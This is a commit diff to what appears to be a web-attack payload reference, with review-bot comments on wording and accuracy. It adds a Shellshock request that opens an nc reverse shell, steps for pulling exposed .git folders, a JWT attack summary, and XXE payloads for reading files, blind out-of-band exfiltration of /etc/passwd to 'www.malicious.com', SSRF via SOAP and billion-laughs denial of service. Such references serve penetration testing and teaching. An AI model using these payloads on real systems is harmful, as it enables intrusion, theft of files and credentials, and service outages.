Attacks details + Summary JWT + XXE adjustments
parent 928a454531
commit 521d61d956
|
@ -1,16 +1,29 @@
|
|||
# Common Vulnerabilities and Exposures
|
||||
|
||||
Big CVEs in the last 5 years.
|
||||
|
||||
## CVE-2014-0160 - Heartbleed
|
||||
|
||||
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
|
||||
|
||||
## CVE-2014-6271 - Shellshock
|
||||
|
||||
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
|
||||
|
||||
```bash
|
||||
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
|
||||
```
|
||||
|
||||
## CVE-2017-5638 - Apache Struts 2
|
||||
|
||||
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
|
||||
|
||||
## CVE-2018-7600 - Drupalgeddon 2
|
||||
|
||||
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
|
||||
|
||||
## Thanks to
|
||||
* http://heartbleed.com
|
||||
* https://en.wikipedia.org/wiki/Shellshock_(software_bug)
|
||||
|
||||
* [Heartbleed - Official website](http://heartbleed.com)
|
||||
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
|
||||
* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
|
||||
|
|
|
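Review bot: The `echo -e "HEAD /cgi-bin/status HTTP/1.1...` line in the Shellshock block opens a double quote that is never closed, so the snippet does not parse as the bash its fence claims. Either close the string or present it as a raw HTTP request in a plain-text fence. In the same hunk, the Struts paragraph says "On March 6th" and "This recent vulnerability" without a year, and the intro says "in the last 5 years"; give absolute dates so the text does not go stale. The reference list also has no source for the Drupalgeddon 2 entry, while the other three CVEs each have one.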
@ -16,10 +16,16 @@
|
|||
|
||||
The following examples will create either a copy of the .git or a copy of the current commit.
|
||||
|
||||
Check for the following files, if they exist you can extract the .git folder.
|
||||
|
||||
- .git/config
|
||||
- .git/HEAD
|
||||
- .git/logs/HEAD
|
||||
|
||||
### Github example with a .git
|
||||
|
||||
1. Check 403 error (Forbidden) for .git or even better : directory listing
|
||||
2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
|
||||
1. Check 403 error (Forbidden) for .git or even better : a directory listing
|
||||
2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
|
||||
```powershell
|
||||
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
||||
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
||||
|
|
|
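Review bot: The excerpt under step 2 is fenced as `powershell`, but its content is the contents of `.git/logs/HEAD` (old hash, new hash, author, timestamp, message), not PowerShell; use a plain-text fence so it is not highlighted as a script. Also in this hunk: "informations" should be "information", the heading should read "GitHub", and "Check for the following files, if they exist you can extract the .git folder." is a comma splice that reads better as two sentences. For readers on the defending side, a short note that these three paths should return 404 from a production web root would make the check actionable.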
@ -2,6 +2,11 @@
|
|||
|
||||
> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
|
||||
|
||||
- JWT Format
|
||||
- JWT Signature - None algorithm
|
||||
- JWT Signature - RS256 to HS256
|
||||
- Breaking JWT's secret
|
||||
|
||||
## JWT Format
|
||||
|
||||
JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)`
|
||||
|
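Review bot: The format line `Base64(Header).Base64(Data).Base64(Signature)` under "## JWT Format" is imprecise, since JWT segments are base64url-encoded without padding, and a reader who decodes them with a standard Base64 routine will hit errors on `-` and `_`. Suggest writing `Base64Url(Header).Base64Url(Payload).Base64Url(Signature)`, which also aligns "Data" with the RFC 7519 term "payload". The new summary entries are plain list items; making them anchor links to their sections (for example `[JWT Format](#jwt-format)`) would make the summary navigable.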
@ -139,3 +144,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
|||
- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
|
||||
- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
||||
- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
|
||||
- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
|
||||
|
|
|
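Review bot: The Auth0 reference added at the end of the list has a doubled trailing slash in its URL (`.../critical-vulnerabilities-in-json-web-token-libraries//`); drop the extra slash so the link is canonical. The entry otherwise follows the title, date and author pattern, which the first item in the list ("5 Easy Steps...") lacks an author for; consider aligning them.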
@ -1,10 +1,11 @@
|
|||
# XML External Entity
|
||||
|
||||
An XML External Entity attack is a type of attack against an application that parses XML input
|
||||
An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities.
|
||||
XML entities can be used to tell the XML parser to fetch specific content on the server.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic Test
|
||||
Basic XML external entity test, the result should contain "John" in `firstName` and "Doe" in `lastName`.
|
||||
|
||||
```xml
|
||||
<!--?xml version="1.0" ?-->
|
||||
|
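Review bot: The first line of the basic test block reads `<!--?xml version="1.0" ?-->`, which is an XML comment rather than an XML declaration, so the sample does not start the way the description implies; write it as `<?xml version="1.0"?>`. The new description "the result should contain "John" in `firstName` and "Doe" in `lastName`" is a good addition, but it should say where the result appears (response body or rendered page). The sentence "fetch specific content on the server" would be more accurate if it said the parser resolves the entity's URI, since the later sections of the same file use `http://` targets as well as local files.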
@ -67,14 +68,16 @@ Classic XXE Base64 encoded
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
|
||||
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
|
||||
]>
|
||||
<foo>&xxe;</foo>
|
||||
```
|
||||
|
||||
## Deny of service
|
||||
|
||||
Deny Of Service - Billion Laugh Attack
|
||||
**Warning** : These attacks will disable the service or the server, do not use them on the Prod.
|
||||
|
||||
Billion Laugh Attack
|
||||
|
||||
```xml
|
||||
<!DOCTYPE data [
|
||||
|
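Review bot: The new section heading "Deny of service" and the line "Deny Of Service - Billion Laugh Attack" should read "Denial of service", and the attack is usually written "Billion Laughs"; the warning's "do not use them on the Prod" reads better as "do not run them against production systems". The typo fix from `convert.bae64-encode` to `convert.base64-encode` is correct. Since this section documents a resource-exhaustion input, one line naming the parser-side control (disabling DTD processing or capping entity expansion) would round out the warning.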
@ -103,8 +106,12 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
|
|||
|
||||
## Blind XXE - Out of Band
|
||||
|
||||
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
|
||||
|
||||
### Blind XXE
|
||||
|
||||
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
|
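Review bot: The description under "### Blind XXE" names "www.malicious.com" as the receiving host, which is a registrable domain rather than a reserved one; use a reserved documentation name such as `attacker.example` so that nobody copying the sample sends file contents to a third party. "you may receive only the first line" also needs its reason stated, and "outputted in the page" reads better as "returned in the page". The new "### Blind XXE" heading sits directly under "## Blind XXE - Out of Band" and nearly repeats it; a more specific subheading would help.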
@ -146,13 +153,17 @@ File stored on http://127.0.0.1/dtd.xml
|
|||
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
|
||||
```
|
||||
|
||||
### XXE Inside SOAP
|
||||
### XXE inside SOAP
|
||||
|
||||
```xml
|
||||
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
|
||||
<soap:Body>
|
||||
<foo>
|
||||
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
|
||||
</foo>
|
||||
</soap:Body>
|
||||
```
|
||||
|
||||
### XXE Inside DOCX file
|
||||
### XXE inside DOCX file
|
||||
|
||||
Format of an Open XML file (inject the payload in any .xml file):
|
||||
|
||||
|
|
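Review bot: The headings are changed to "XXE inside SOAP" and "XXE inside DOCX file" while "Blind XXE - Out of Band" earlier in the same file keeps title case, so the file now mixes two heading styles; pick one and apply it throughout. The reflowed SOAP sample is easier to read, but it uses the `soap:` prefix with no namespace declaration or enclosing Envelope, so label it as a fragment of a request body. The sentence "inject the payload in any .xml file" would also be clearer if it said these are the XML parts inside the DOCX archive.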